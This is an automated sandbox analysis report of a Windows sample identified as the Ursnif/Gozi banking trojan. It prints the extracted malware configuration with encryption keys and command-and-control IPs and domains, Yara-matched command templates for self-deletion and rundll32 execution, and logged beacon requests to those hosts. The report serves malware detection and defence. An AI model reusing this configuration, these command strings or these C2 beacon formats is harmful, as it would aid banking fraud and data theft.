Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
server.exe

Overview

General Information

Sample Name:server.exe
Analysis ID:825996
MD5:bfe5c79a11ef437d401fe8a27ea49372
SHA1:bd04d26776c766934f0acd2885cf97168dc5bbfb
SHA256:881d60034e97cfa4e36b8da907e5d2e130c9f19abdd386990ee5a9cdce91d117
Tags:agenziaentrateexegoziisfbITAmefmiseursnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Found evasive API chain (may stop execution after checking system information)
Writes or reads registry keys via WMI
Writes registry values via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Found evasive API chain checking for process token information
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • server.exe (PID: 6020 cmdline: C:\Users\user\Desktop\server.exe MD5: BFE5C79A11EF437D401FE8A27EA49372)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Gozi, Ursnif2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gozi

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x58a1:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1ce8:$a9: Software\AppDataLow\Software\Microsoft\
    Click to see the 27 entries

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: server.exeReversingLabs: Detection: 38%
    Source: server.exeVirustotal: Detection: 50%Perma Link
    Machine Learning detection for sample
    Source: server.exeJoe Sandbox ML: detected
    Source: 0.2.server.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
    Source: 00000000.00000003.244409614.0000000000790000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "2cHitNE2khtX8MPowN3OuEF+nIJiRQvDS0CByWczHAmlx7InAyPYhqz4W4BdwOQhPXM+cNmTKZrjXkeaD1W/JReU+0QfnRaZLQzMkbf/6hntYeJLN9kVYaXwOSubcfndLd/IRF3zHco37HpGyfr/fx+pYcUFQUpDPSBwxpcqOgAGHU0ELflY4Wg7JTro/JzFnlTf/qZRLIK0F3z73FRQhjYYH8ldszb/+eADX8rn6ird+QrxU0NdIdel89Q7IsIw6+kcDa/Uh8s29ZPGfilEQcNwZsKPhbL1nQo8gRUU9nCXs8mGibasUhj7JSzvSDXMce/idAcO3inRDu0kAkFPSSWXYHucvOV7UqKvwvqosHo=", "c2_domain": ["checklist.skype.com", "62.173.142.51", "94.103.183.153", "193.233.175.111", "109.248.11.145", "31.41.44.106", "191.96.251.201"], "botnet": "7713", "server": "50", "serpent_key": "rqDYWFa4uPXuBFMj", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_007E1508

    Compliance

    barindex
    Detected unpacking (overwrites its own PE header)
    Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
    Source: server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: global trafficHTTP traffic detected: GET /drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb_2BVZ4b1fMQvftqC/DrhbQbfPiZSBlmnh/Q60mymncnsD1BSl/lgW04WzkBwMabSScvE/3MDL0Eyu0/chVZbMtmkjfLI4ISTEnD/sLlQp4wto2w2tJ4sMhW/deWpiBQ03TPTGzGU4_2FTK/eoq2qHiaYlnL2/Y44FiYqv/mKJo7GKlTdrY4JvUjnEzoh2/JtdyUM2ECt/vn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.51
    Source: server.exe, 00000000.00000002.510020655.00000000023CC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://62.173
    Source: server.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.173.142.51/
    Source: server.exe, 00000000.00000002.509818085.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.173.142.51/b
    Source: server.exe, 00000000.00000002.509882695.00000000008A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.173.142.51/drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb
    Source: server.exe, 00000000.00000002.509882695.0000000000863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checklist.skype.com/drew/libExsiR_2B8yxsG/gzT0k6OLSRpq780/hHFpS0TQeiCZoSZxmo/_2BfNC9Bm/rlL_2B
    Source: unknownDNS traffic detected: queries for: checklist.skype.com
    Source: global trafficHTTP traffic detected: GET /drew/9JLLLQ08ZT/3nAR5UipYIcJ6YCNU/DQSgo3cwsXXD/wvZ5vmAsFoS/eN07eLMp7RXTwB/STvLb_2BVZ4b1fMQvftqC/DrhbQbfPiZSBlmnh/Q60mymncnsD1BSl/lgW04WzkBwMabSScvE/3MDL0Eyu0/chVZbMtmkjfLI4ISTEnD/sLlQp4wto2w2tJ4sMhW/deWpiBQ03TPTGzGU4_2FTK/eoq2qHiaYlnL2/Y44FiYqv/mKJo7GKlTdrY4JvUjnEzoh2/JtdyUM2ECt/vn.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.51Connection: Keep-AliveCache-Control: no-cache

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Yara detected Ursnif
    Source: Yara matchFile source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR
    Source: server.exe, 00000000.00000002.509818085.000000000083A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

    E-Banking Fraud

    barindex
    Yara detected Ursnif
    Source: Yara matchFile source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTR
    Source: C:\Users\user\Desktop\server.exeCode function: 0_2_007E1508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_007E1508

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: Process Memory Space: server.exe PID: 6020, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Writes or reads registry keys via WMI
    Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
    Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
    Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Users\user\Desktop\server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
    Writes registry values via WMI
    Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
    Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Users\user\Desktop\server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
    Source: server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.509856527.0000000000850000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.509728577.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439407520.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439271373.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439423736.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439453495.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439387430.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000002.510107149.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439306585.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.439442593.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.439341989.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
